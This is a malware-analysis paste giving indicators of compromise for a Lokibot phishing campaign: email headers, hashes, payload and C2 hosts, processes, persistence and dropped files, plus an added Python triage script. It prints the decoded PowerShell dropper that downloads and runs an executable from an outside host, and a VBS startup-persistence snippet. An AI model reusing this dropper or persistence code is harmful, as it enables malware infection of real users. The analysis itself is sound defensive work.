#Lokibot_161018

VRad Oct 17th, 2018 (edited)
#IOC #OptiData #VR #Lokibot #X97M #macro #powershell

https://pastebin.com/LPqjHUkQ
FAQ:
https://radetskiy.wordpress.com/?s=lokibot

attack_vector
--------------
email > attach XLS > VBA > powershell > GET > %userprofile%\MyP8Mihuih.exe

email_headers
--------------
Received: from gunimo.com ([159.65.179.93])
    by mailsrv2.victim1.com (8.15.2/8.15.2) with ESMTP id w9GDZxoi074233
    for <user0@org2.victim1.com>; Tue, 16 Oct 2018 16:35:59 +0300 (EEST)
    (envelope-from replymail202@gmail.com)
Received: from [103.99.1.148] (helo=User)
    by gunimo.com with esmtpa (Exim 4.84_2)
    (envelope-from <replymail202@gmail.com>)
    id 1gCPVH-00082K-4q; Tue, 16 Oct 2018 13:35:24 +0000
Reply-To: <replymail202@gmail.com>
From: "FREDRICK (BESTLABS)"<replymail202@gmail.com>
Subject: Purchase Order (BESTLABS)
Date: Tue, 16 Oct 2018 06:35:11 -0700

email_subjects
--------------
Purchase Order (BESTLABS)

files
--------------
SHA-256 a0735fd6ae06e59370e2702bdfda81f90d9b2489f3a483104469a0f4c596d552
File name   87041166.xls
File size   61 KB

SHA-256 078028b6a99daeb8576b1c33073732b0b65bd6c4eddcc2b061fdadf037e9063c
File name   chri1.jpg   This program must be run under Win32
File size   661 KB

activity
**************

payload
181.174.165.161 http://octap{.} igg{.} biz/01/chri1.jpg
C2
103.109.184.60 http://octone{.} igg{.} biz/chri1/cgi.php

netwrk
--------------
181.174.165.161 octap{.} igg{.} biz GET /01/chri1.jpg HTTP/1.1  (!) no User Agent
103.109.184.60  octone{.} igg{.} biz    POST /chri1/cgi.php HTTP/1.0    (!) Mozilla/4.08 (Charon; Inferno) < #Lokibot User Agent

comp
--------------
powershell.exe      1148    181.174.165.161 80  ESTABLISHED
[System Process]    0   103.109.184.60  80  TIME_WAIT
[System Process]    0   103.109.184.60  80  TIME_WAIT
iigyhe.exe      2364    103.109.184.60  80  ESTABLISHED

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e\
C:\Windows\SysWOW64\cMD.exe cMD & /C PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAARAAzAG8AQgBYAGQASABiAHMANwA4AH...
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowErSHeLl  -En ZgB1AG4AYwB0AGkAbwBuACAARAAzAG8AQgBYAGQASABiAHMANwA4AH...
"C:\Users\operator\MyP8Mihuih.exe"
"C:\Users\operator\AppData\Roaming\iihge\iigyhe.exe"
"C:\Users\operator\AppData\Roaming\iihge\iigyhe.exe"

base64_decode
---------------
function D3oBXdHbs78ytXnPChs ( $NESUp2oGBWEZeslGaAmpDeDWO , $zZLx5PqAyovtf8HsUEDmfbEGOL )
{(New-Object System.Net.WebClient).DownloadFile( $NESUp2oGBWEZeslGaAmpDeDWO , $zZLx5PqAyovtf8HsUEDmfbEGOL );
(New-Object -com Shell.Application).ShellExecute( $zZLx5PqAyovtf8HsUEDmfbEGOL ); }
try{
$mVLKMABGL2alewvZd2=$env:USERPROFILE+'\MyP8Mihuih.exe';
D3oBXdHbs78ytXnPChs 'http://octap{.} igg{.} biz/01/chri1.jpg' $mVLKMABGL2alewvZd2;
}catch{}
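
The -En argument in the proc lines is this script, UTF-16LE encoded and then base64 encoded, which is how the stage above was recovered. The Python below is an added triage example (not part of the original paste): it rebuilds a command line of that shape from the decoded stage, recovers and scores the script for download-and-execute markers, and checks constructed log lines modelled on the netwrk section for the two indicators noted there (a GET with no User-Agent and the Mozilla/4.08 (Charon; Inferno) C2 user agent). The tab-separated log format, the marker list and the sample lines are assumptions for the example.

```python
import base64
import re
# Decoded PowerShell stage from the paste (URL defanged as on the page); used here
# only to rebuild a -En command line shaped like the one in the 'proc' section.
STAGE = (
    "function D3oBXdHbs78ytXnPChs ( $NESUp2oGBWEZeslGaAmpDeDWO , $zZLx5PqAyovtf8HsUEDmfbEGOL )\n"
    "{(New-Object System.Net.WebClient).DownloadFile( $NESUp2oGBWEZeslGaAmpDeDWO , $zZLx5PqAyovtf8HsUEDmfbEGOL );\n"
    "(New-Object -com Shell.Application).ShellExecute( $zZLx5PqAyovtf8HsUEDmfbEGOL ); }\n"
    "try{ $mVLKMABGL2alewvZd2=$env:USERPROFILE+'\\MyP8Mihuih.exe';\n"
    "D3oBXdHbs78ytXnPChs 'http://octap{.} igg{.} biz/01/chri1.jpg' $mVLKMABGL2alewvZd2; }catch{}"
)
LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...).
ENC_FLAG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
MARKERS = ("DownloadFile", "ShellExecute", "$env:USERPROFILE", "DownloadString")  # assumed list

def encode_command(script):
    """Build a 'PowErSHeLl -En <b64>' command line as seen in the 'proc' section."""
    return "PowErSHeLl -En " + base64.b64encode(script.encode("utf-16-le")).decode()

def decode_encoded_command(cmdline):
    """Recover the UTF-16LE script behind -En; None if absent or truncated (as in the paste)."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_script(script):
    """List the download-and-execute markers present in a decoded script."""
    return [k for k in MARKERS if k.lower() in script.lower()]

def classify_http(line):
    """Triage one constructed 'host<TAB>method<TAB>path<TAB>user-agent' line ('-' = no UA)."""
    host, method, _path, ua = line.split("\t")
    if ua == LOKIBOT_UA:
        return host, "lokibot-c2"
    if method == "GET" and ua == "-":
        return host, "no-ua-download"
    return host, "ok"

# Constructed log lines modelled on the 'netwrk' section plus one benign request.
SAMPLE_LOG = [
    "octap{.} igg{.} biz\tGET\t/01/chri1.jpg\t-",
    "octone{.} igg{.} biz\tPOST\t/chri1/cgi.php\t" + LOKIBOT_UA,
    "update.example.test\tGET\t/ok.txt\tMozilla/5.0",
]
```

The truncated `-En ZgB1...AH...` string as printed in the proc section does not decode (bad padding), so the full command line has to be pulled from process-creation telemetry before decoding.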

persist
--------------
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup             17.10.2018 17:03
iihge.vbs           c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\iihge.vbs   17.10.2018 17:03

vbs
--------------
Set qqRtjAUYnqWIRiSE = CreateOBject("wScriPt.sheLl")
qQrTjAUyNQwIRise.rUn """C:\Users\operator\AppData\Roaming\iihge\iigyhe.exe"""

drop
--------------
C:\Users\operator\MyP8Mihuih.exe
C:\Users\operator\AppData\Roaming\39B01F
C:\Users\operator\AppData\Roaming\39B01F\FA74A3.exe
C:\Users\operator\AppData\Roaming\39B01F\FA74A3.hdb
C:\Users\operator\AppData\Roaming\iihge

# # #
https://www.virustotal.com/#/file/a0735fd6ae06e59370e2702bdfda81f90d9b2489f3a483104469a0f4c596d552/details
https://www.virustotal.com/#/file/078028b6a99daeb8576b1c33073732b0b65bd6c4eddcc2b061fdadf037e9063c/details
https://analyze.intezer.com/#/analyses/a8e828da-f1f2-4817-ad4d-4c004486deb4